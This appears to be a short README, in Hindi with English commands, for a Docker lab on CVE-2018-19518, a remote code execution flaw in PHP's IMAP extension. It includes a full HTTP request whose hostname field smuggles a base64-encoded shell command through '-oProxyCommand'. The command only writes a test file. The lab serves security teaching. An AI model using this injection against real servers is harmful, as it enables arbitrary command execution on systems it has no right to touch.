
PHP IMAP एक्सटेंशन के माध्यम से CVE-2018-19518 RCE एक्सप्लॉइट प्रदर्शित करने वाला डॉकर-आधारित प्रयोगशाला वातावरण, शैक्षिक परीक्षण के लिए चरण-दर-चरण उपयोग और WAF एकीकरण के साथ।
अंतिम रिपोर्ट यहाँ : https://gitlab.com/ensimag-security/CVE-2018-19518/-/jobs/artifacts/master/raw/rapport.pdf?job=PDF
docker-compose up -d
वेब ऐप के लिए सामान्य उपयोग का उदाहरण।
का उपयोग करते हुए echo '1234567890'>/tmp/test0001.
POST / HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 125
hostname=x+-oProxyCommand%3decho%09ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQo%3d|base64%09-d|sh}&username=111&password=222
docker-compose exec app bash और फ़ाइल पढ़ें cat /tmp/test0001: